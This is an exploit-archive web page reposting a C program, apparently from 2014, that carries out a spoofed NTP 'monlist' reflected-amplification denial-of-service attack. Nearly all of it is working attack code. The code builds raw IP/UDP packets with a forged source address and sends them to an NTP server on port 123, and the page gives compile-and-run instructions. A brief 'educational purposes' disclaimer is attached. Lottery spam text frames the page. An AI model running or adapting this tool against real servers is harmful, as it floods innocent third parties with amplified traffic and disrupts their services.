湖北11选5任选分布走势图一定牛
     
首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NTP Spoofed "monlist query" Denial Of Service Proof Of Concept
来源:vfocus.net 作者:Mark Osborne 发布时间:2014-03-19  

//   PROGRAM :   NTP_SPQUERY.c
//
//   AUTHOR :    loud-fat-bloke /   MARK OSBORNE
//
//   Description:
//
//    REFLECTED AMPLIFICATION NTP ATTACK
//
//    A well known security journal has asked me to do a piece on NTP ddos
//    and being a bit reactionary (OCD in other words)
//    I figured I would show that NTP and DNS DrdOS are related and conform to a common formulae. 
//    Therefore I have used the DNS_SPQUERY program I wrote 6 months ago to convert into NTP_SQUERY with minimal changes
//
//    NTP_SPQUERY.C is an "monlist query"  REFLECTED AMPLIFICATION NTP ATTACK that are common in March 2014
//
//
//   As part of the charity project
//                                 "CyberAttack CyberCrime CyberWarfare Cyber-Complacency"
//  
//   I have tried to use a book, youtube presentations, in person lectures and Android Apps to Highlight three key cyber points :
//   1 - that in europe a cyber attack by any group of proficient computer literate parties could cripple the infrastructure
//   2 - that formalised cyber security  monitoring is required to prevent this - not militaristic, counter espionage initiatives
//       which are hang overs from the cold ware
//   3 - Privacy campaigners generaly make things work by assuming "cyber security" monitoring fits into this
//       espionage initiatives describes above
//
//   charity project? -  proceeds from the book, the APPs and personal appearances go to medical charity for sepsis awareness
//
//
//  **** DO NO HARM WITH THIS PROGRAM *********
// 
//  the author has produced it for educational purposes only
//
//
/*   to build and run me  cut and paste the below 10 lines into your shell on a nice LINUX box
# compile  me
#
  gcc   ntp_spquery.c -o ntp_spquery
#
# run me                                                                                                     
#               SPOOFED_S_IP         NTP SERVER TARGET        
./ntp_spquery   192.168.0.121        192.168.0.120          
#
#
#
#
*/
char *pretty= "\n ---------------------------------------------------------------------------------- \n";
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>    
#include <string.h>        
#include <netdb.h>        
#include <sys/types.h>   
#include <sys/socket.h> 
#include <netinet/in.h>   
#include <netinet/ip.h>  
#include <netinet/udp.h>
#include <arpa/inet.h> 
#include <net/if.h>   
#include <sys/socket.h>
#include <syslog.h>
#include <netinet/in.h>
#include <stdio.h>
int udpsockfd,n;

#define PROGRAM    "NTP_SPQUERY"
 
 
//NTP header structure
struct NTP_HEADER
{
    unsigned short id; // identification number
 
    unsigned char li :2; //
    unsigned char vn :3; //
    unsigned char rb :1; //
    unsigned char eb :1; //
    unsigned char mb :1; //
    unsigned char opcode :5;
    unsigned char data[10] ; //
};
 
/*
char *pretyy= "\n \n DNS_SPQUERY - Amplification and Refelector  \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
*/
          
char *pretyy= "\n \n NTP_SPQUERY - Amplification and Refelector  \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
char *pretyz= " \tIs Hollywood's blueprint for Chaos coming true' by Mark Osborne\n \t ISBN-13: 978-1493581283 ISBN-10: 1493581287 \n\n";

unsigned char buf[4000];
int data_length ;                                           

/*


#  LeapIndicator = 0 , VersionNum = 3 or 2 , Mode = 3 (Client Mode)
#NTP v2 Monlist Request :
# data = "0x17,x00,x03,x2a,x00"
#NTP v3 Monlist Request :
# data = "0x1b,x00,x03,x2a,x00"
*/

// Define some constants.
#define IP4_HDRLEN 20         // IPv4 header length
#define UDP_HDRLEN  8         // UDP header length, excludes data

int
spoofudp (char *saddr,int sport, char *daddr, int   dport, int datalen,  char *udppacket)
{
  int   sd ;
  const int on = 1;
  struct ip iphdr, *iphdr_ptr;
  struct udphdr udphdr, *udphdr_ptr;
  unsigned char *data, *packet;
  struct sockaddr_in  sin;
  unsigned  char  x[10000];     // the buffer
//                                                  Allocate memory for various headers and offsets.
  packet       = x     ;
  iphdr_ptr = x     ;
//  datalen = dnslength;       
//  UDP header  ptr .
  udphdr_ptr =       (packet + IP4_HDRLEN);
//  UDP data ptr .
  data =  (packet + IP4_HDRLEN + UDP_HDRLEN);
//                                                  UDP data -copy it at the end
  memcpy (data  , udppacket ,datalen   );
// IPv4 header
  iphdr_ptr->ip_hl =5;
  iphdr_ptr->ip_v = 4;
  iphdr_ptr->ip_tos = 0;
  iphdr_ptr->ip_len = htons (IP4_HDRLEN + UDP_HDRLEN + datalen);
  iphdr_ptr->ip_id = htons (0);
  iphdr_ptr->ip_off = htons (0);
  iphdr_ptr->ip_ttl = 255;
  iphdr_ptr->ip_p = IPPROTO_UDP;
  iphdr_ptr->ip_dst.s_addr = inet_addr (daddr );         
  iphdr_ptr->ip_src.s_addr = inet_addr (saddr );     /* SPOOOOPH di source IP */
  iphdr_ptr->ip_sum = 0;  //kernel do this please

//                                                   UDP header
  udphdr_ptr->source = htons (sport);
  udphdr_ptr->dest = htons (dport);
  udphdr_ptr->len = htons (UDP_HDRLEN + datalen);
  udphdr_ptr->check = 0;                              // hey misterkernal do your job for me
//                                                   zero ise sockeet  data.
  memset (&sin, 0, sizeof (struct sockaddr_in));
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = iphdr_ptr->ip_dst.s_addr;
//                                                   open a raw socket
  if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    perror ("socket() failed ");
    exit (2);
  }
// unless the socket is set with IP_HDRINCL a random IP datagram will go
// out on the wire  nearly all Linux kernals allow many bsd sun aix and hp dont
  if (setsockopt (sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) {
    perror ("setsockopt() failed to set IP_HDRINCL ");
    exit (3);
  }
//                                                    Send packet.
  if (sendto (sd, packet, IP4_HDRLEN + UDP_HDRLEN + datalen, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0)  {
    perror ("sendto() failed ");
    exit (EXIT_FAILURE);
  }
// Close socket descriptor.
  close (sd);
}


usage ()
  {
  fprintf(stderr,"Program Usage: \n  %s   SOURCE_DOT_ADDR  DEST_DOT_ADDR  \n\n", PROGRAM);
  exit(1);
  }

unsigned char out[1000];
int len1 = 0, len2 = 0 ,len3 = 0   ;
int pants;
 
int
main( int argc , char *argv[])
  {
  char *out_temp;
  if ( argc != 3 )
     usage();
  /*                                                                                                                                    */             printf(pretyy ) ;
  /*                                                                                                                                    */             printf(pretyz ) ;
  printf(" Spoof Source ip: \t \t %s \n Dest ip: \t \t  %s \n \n \n ",   argv[1] ,
                   argv[2]                 );
//
memset(buf,0x00,0xfF);
sprintf(buf,"%c%c%c%c%c", 0x17,0x00,0x03,0x2a,0x00);

  data_length  = 9                   ;
  printf(pretty ) ;
//
//
// my pretty
  for (pants=0; pants < 30 ; pants++ )
    printf("%x ", buf[pants]);
//

  printf("\nNTP PACKET len \t \t %i \n" ,  data_length ) ;
//
//  Writes out a spoofed UDP Packet
//    written for my rfc 2827 survey which never got finished
//
  spoofudp (argv[1]        ,4950, argv[2]        , 123 ,  data_length, buf );
 
  return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·Array Networks vxAG / xAPV Pri
·Quantum vmPRO Backdoor Command
·HP-UX rlpdaemon local exploit
·Loadbalancer.org Enterprise VA
·MP3Info 0.8.5a - SEH Buffer Ov
·Gold MP4 Player 3.3 - Universa
·SePortal 2.5 - SQL Injection V
·Trixbox Pro Remote Command Exe
·Quantum vmPRO 3.1.2 - Privileg
·iOS 7 Arbitrary Code Execution
·Loadbalancer.org Enterprise VA
·OS X / Safari / Firefox REGEX
  推荐广告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
湖北11选5任选分布走势图一定牛